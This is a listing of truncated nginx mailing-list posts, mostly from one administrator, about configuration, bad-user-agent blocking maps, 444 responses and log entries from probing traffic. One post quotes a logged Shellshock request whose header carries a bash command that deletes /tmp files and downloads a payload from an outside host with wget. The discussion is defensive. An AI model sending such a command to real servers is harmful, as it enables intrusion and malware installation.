Question regarding $invalid_referer

I am presently using a scheme like this to prevent scraping documents. location /images/ { valid_referers none blocked www.example.com example.com forums.othersite.com ; # you can tell the browser that it can only download content from the

Re: nginx redirects all requests to root

On Mon, 20 Jun 2022 17:23:23 -0400 "_lukman_" wrote: > server > { >listen 443 default_server ssl; >listen [::]:443 ssl http2; >server_name dummysite.io www.dummysite.io; >ssl_certificate /etc/letsencrypt/live/dummysite.io/fullchain.pem; # > managed by Certbot >

Re: 200 html return to log4j exploit

ry to > interpolate these, and thus be vulnerable to the exploit. > > On Mon, 20 Dec 2021 at 04:02, li...@lazygranch.com > wrote: > > > I don't have any service using java so I don't believe I am subject > > to this exploit. Howerver I am confused why a returned a 200 for >

200 html return to log4j exploit

I don't have any service using java so I don't believe I am subject to this exploit. Howerver I am confused why a returned a 200 for this request. The special characters in the URL are confusing. 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +] "GET / HTTP/1.1" 706

Re: Nginx not responding to port 80 on public IP address

I insist on encryption so this is what I use: server { listen 80; server_name yourdomain.com www.yourdomain.com ; if ($request_method !~ ^(GET|HEAD)$ ) { return 444; } return 301 https://$host$request_uri; } I only serve static pages so I use

Re: Prevent direct access to files but allow download from site

Answers intermixed below. On Wed, 11 Mar 2020 21:23:15 -0400 "MAXMAXarena" wrote: > Hello @Ralph Seichter, > what do you mean by "mutually exclusive"? > As for the tools I mentioned, it was just an example. > Are you telling me I can't solve this problem? > > > Hello @garic, > thanks for this

Re: Possible memory leak?

On Fri, 08 Mar 2019 10:42:28 -0500 "wkbrad" wrote: > Thanks for that info. It's definitely harder to notice the issue on > small servers like that. But you are still seeing about a 50% > increase in ram usage there by your own tests. > > The smallest server I've tested this on uses about 20M

Re: Possible memory leak?

On Thu, 07 Mar 2019 13:33:39 -0500 "wkbrad" wrote: > Hi all, > > I just wanted to share the details of what I've found about this > issue. Also thanks to Maxim Dounin and Reinis Rozitis who gave some > really great answers! > > The more I look into this the more I'm convinced this is an issue

Re: I need my “bad user agent” map not to block my rss xml file

On Thu, 10 Jan 2019 08:50:33 + Francis Daly wrote: > On Wed, Jan 09, 2019 at 06:14:04PM -0800, li...@lazygranch.com wrote: > > Hi there, > > > location / { > > if ($badagent) { return 403; } > > } > > location = /feeds { >

Re: I need my “bad user agent” map not to block my rss xml file

On Wed, 9 Jan 2019 08:20:05 + Francis Daly wrote: > On Tue, Jan 08, 2019 at 07:30:44PM -0800, li...@lazygranch.com wrote: > > Hi there, > > > Stripping down the nginx.conf file: > > > > server{ > > location / { > > root

Need logic to not check for bad user agent if xml file

I have a map to check for bad user agents called badagent. I want to set up a RSS feed. The feedreaders can have funny agents, so I need to omit the bad agent check if the file is any xml type. This is rejected. if (($request_uri != [*.xml]) && ($badagent)) {return 444; } Suggestions?

Dynamic modules versus build from scratch

The centos nginx from the repo lacks ngx_http_hls_module. This is a technique to add the module without compilation. https://dzhorov.com/2017/04/compiling-dynamic-modules-into-nginx-centos-7 Does anyone have experience with this? I'd like to avoid building nginx from scratch to make the updates

Re: Aborting malicious requests

On Tue, 20 Mar 2018 13:03:09 + "Friscia, Michael" wrote: > This is great, thank you again, this is a huge jumpstart! Per NIST best practices, you should limit the HTML verbs that you allow. A very simple website can run on just GET and HEAD. Here is how you 444

Re: Aborting malicious requests

On Mon, 19 Mar 2018 12:31:20 + "Friscia, Michael" wrote: > Just a thought before I start crafting one. I am creating a > location{} block with the intention of populating it with a ton of > requests I want to terminate immediately with a 444 response. Before > I

Re: newbie: nginx rtmp module

I had a few neurons fire. I forgot nginx can load dynamic modules. https://www.nginx.com/blog/nginx-dynamic-modules-how-they-work/ I haven't done this myself, so you are on your own at this point. On Fri, 09 Mar 2018 11:59:30 -0500 "neuronetv" wrote: > I've

Re: Flush access log buffer

On Fri, 23 Feb 2018 18:54:48 -0800 "li...@lazygranch.com" <li...@lazygranch.com> wrote: > On Thu, 22 Feb 2018 18:40:12 -0800 > "li...@lazygranch.com" <li...@lazygranch.com> wrote: > > > When I was using FreeBSD, the access log was real time

MAP location in conf file

Presently I'm putting maps in the server location. Can they be put in the very top to make them work for all servers? If not, I can just make the maps into include files and insert as needed, but maybe making the map global is more efficient. ___ nginx

Re: Centos 7 file permission problem

<aroz...@nginx.com> wrote: > Hi, > > have you checked this with disabled selinux ? > > br, > Aziz. > > > > > > > On 20 Dec 2017, at 11:07, li...@lazygranch.com wrote: > > > > I'm setting up a web server on a Centos 7 VPS. I'm relat

Centos 7 file permission problem

I'm setting up a web server on a Centos 7 VPS. I'm relatively sure I have the firewalls set up properly since I can see my browser requests in the access and error log. That said, I have file permission problem. nginx 1.12.2 Linux servername 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50

Re: How to control the total requests in Ngnix

Here is a log of real life IP limiting with a 30 connection limit: 86.184.152.14 British Telecommunications PLC 8.37.235.199 Level 3 Communications Inc. 130.76.186.14 The Boeing Company security.5.bz2:Nov 29 20:50:53 theranch kernel: ipfw: 5005 drop session type 40 86.184.152.14 58714 -> myip

Response code 400 rather than 404

I'm curious why this request got a 400 response rather than a 404. 400 123.160.235.162 - - [16/Jul/2017:22:56:30 +] "GET /currentsetting.htm HTTP/1.1" 173 "-" "-" "-" log_format main '$status $remote_addr - $remote_user [$time_local] "$request" ' '$body_bytes_sent

Re: FreeBSD Clean Install nginx.pid Permissions Errors

On Thu, 13 Jul 2017 23:46:12 +0100 Francis Daly wrote: > On Thu, Jul 13, 2017 at 09:37:08AM -0400, Viaduct Lists wrote: > > Hi there, > > > [Wed Jul 12 06:08:41 rich@neb /var/log/nginx] nginx -t > > If you were running this command as "root", would that prompt say >

Re: block google app

I'm sending 403 responses now, so I screwed up by mistaking the fields in the logs. I'm going back to lurking mode again with my tail shamefully between my legs. This code in the image location section will block the google app: if ($http_user_agent ~*

Re: block google app

Actually I think I was mistaken and the field is the user agent. I will change the variable and see what happens. I did some experiments to show the pattern match works. On Tue, 20 Jun 2017 20:56:46 -0700 li...@lazygranch.com wrote: > I want to block by referrer. I provided a more &quo

Re: block google app

On Tue, 20 Jun 2017 17:49:14 -0700 Robert Paprocki <rpapro...@fearnothingproductions.net> wrote: > Do you mean $http_user_agent? > > > On Jun 20, 2017, at 17:36, "li...@lazygranch.com" > > <li...@lazygranch.com> wrote: > > > > I would

block google app

I would like to block the google app from directly downloading images. access.log: 200 186.155.157.9 - - [20/Jun/2017:00:35:47 +] "GET /images/photo.jpg HTTP/1.1" 334052 "-" "com.google.GoogleMobile/28.0.0 iPad/9.3.5 hw/iPad2_5" "-" My nginx code in the images location: if

Re: WordPress pingback mitigation

Here is the map. I truncated my bad agent list, but will get you started. I used the user agent changer in Chromium to make sure it worked. - map $http_user_agent $badagent { default0; ~*WordPress

hacker proxy attempt

A bit OT, but can a guru verify I rejected all these proxy attempts. I'm 99.9% sure, but I'd hate to allow some spammer or worse to route through my server. The only edit I made is when they ran my IP address though a forum spam checker. (I assume google indexes pastebin.)

Is this a valid request?

I keep my nginx server set up dumb. (Don't need anything fancy at the moment). Is this request below possibly valid? I flag anything with a question mark in it as hacking, but maybe IOS makes some requests that some websites will process, and others would just ignore after the question mark. 444

Unexptected return code

I only serve static pages, hence I have this in my conf file: --- ## Only allow these request methods ## if ($request_method !~ ^(GET|HEAD)$ ) { return 444; } Shouldn't the return code be 444 instead of 400?

Re: Hacker log

On Sat, 22 Oct 2016 17:40:56 -0400 "itpp2012" wrote: > The idea is nice but pointless, if you maintain this list over 6 > months you most likely will end up blocking just about everyone. > > Stick to common sense with your config, lock down nginx and the > backends,

Hacker log

http://pastebin.com/7W0uDrLa If you need an extensive list of hacker requests (over 200), I put this log entry on pastebin. As mentioned at the top of the pastebin, the hacker used my IP address directly rather than my doman name. I have a "map" that detects typical hacker activity. Perhaps in

Re: fake googlebots

http://pastebin.com/tZZg3RbA/?e=1 This is the access.log file data relevant to that fake googlebot. It starts with a fake googlebot entry, then goes downhill from there. I rate limit at 10/s. I only allow the verbs HEAD and GET, so the POST went to 444 directly. I replaced the domain with a fake

fake googlebots

I got a spoofed googlebot hit. It was easy to detect since there were probably a hundred requests that triggered my hacker detection map scheme. Only two requests received a 200 return and both were harmless. 200 118.193.176.53 - - [25/Sep/2016:17:45:23 +] "GET / HTTP/1.1" 847 "-"

Re: limit-req and greedy UAs

should try to duplicate this in the event it has something to do with my setup. On Mon, 12 Sep 2016 15:30:01 -0700 li...@lazygranch.com wrote: > Most of the chatter on the interwebs believes that the rate limit is > per connection, so if some IP opens up multiple connections, they get

Re: Problems with custom log file format

Link goes to conf file https://www.dropbox.com/s/1gz5139s4q3b7e0/nginx.conf?dl=0 On Tue, 23 Aug 2016 20:51:55 +0300 "Reinis Rozitis" wrote: > > Configuration file included in the post. I already checked it. > > You have shown only few excerpts (like there might be other >

Problems with custom log file format

Nginx 1.10.1,2 FreeBSD 10.2-RELEASE-p18 #0: Sat May 28 08:53:43 UTC 2016 I'm using the "map" module to detect obvious hacking by detecting keywords. (Yes, I know about Naxsi.) Finding the really dumb hacks is easy. I give them a 444 return code with the idea being I can run a script on the log

Re: Hierarchy of malformed requests and blocked IPs

On Sat, 30 Jul 2016 23:49:30 +0300 "Valentin V. Bartenev" <vb...@nginx.com> wrote: > On Saturday 30 July 2016 10:52:46 li...@lazygranch.com wrote: > > On Sat, 30 Jul 2016 13:18:47 +0300 > > "Valentin V. Bartenev" <vb...@nginx.com> wrote

Bash script; Was it executed?

I see a return code of 200. Does that mean this script was executed? - 219.153.48.45 - - [30/Jul/2016:07:40:07 +] "GET / HTTP/1.1" 200 643 "() { :; }; /bin/bash -c \x22rm -rf /tmp/*;ech o wget http://houmen.linux22.cn:123/houmen/linux223 -O /tmp/China.Z-slma >> /tmp/Run.sh;echo

Re: Hierarchy of malformed requests and blocked IPs

On Sat, 30 Jul 2016 13:18:47 +0300 "Valentin V. Bartenev" <vb...@nginx.com> wrote: > On Friday 29 July 2016 23:01:05 li...@lazygranch.com wrote: > > I see a fair amount of hacking attempts in the access.log. That is, > > they > show up with a return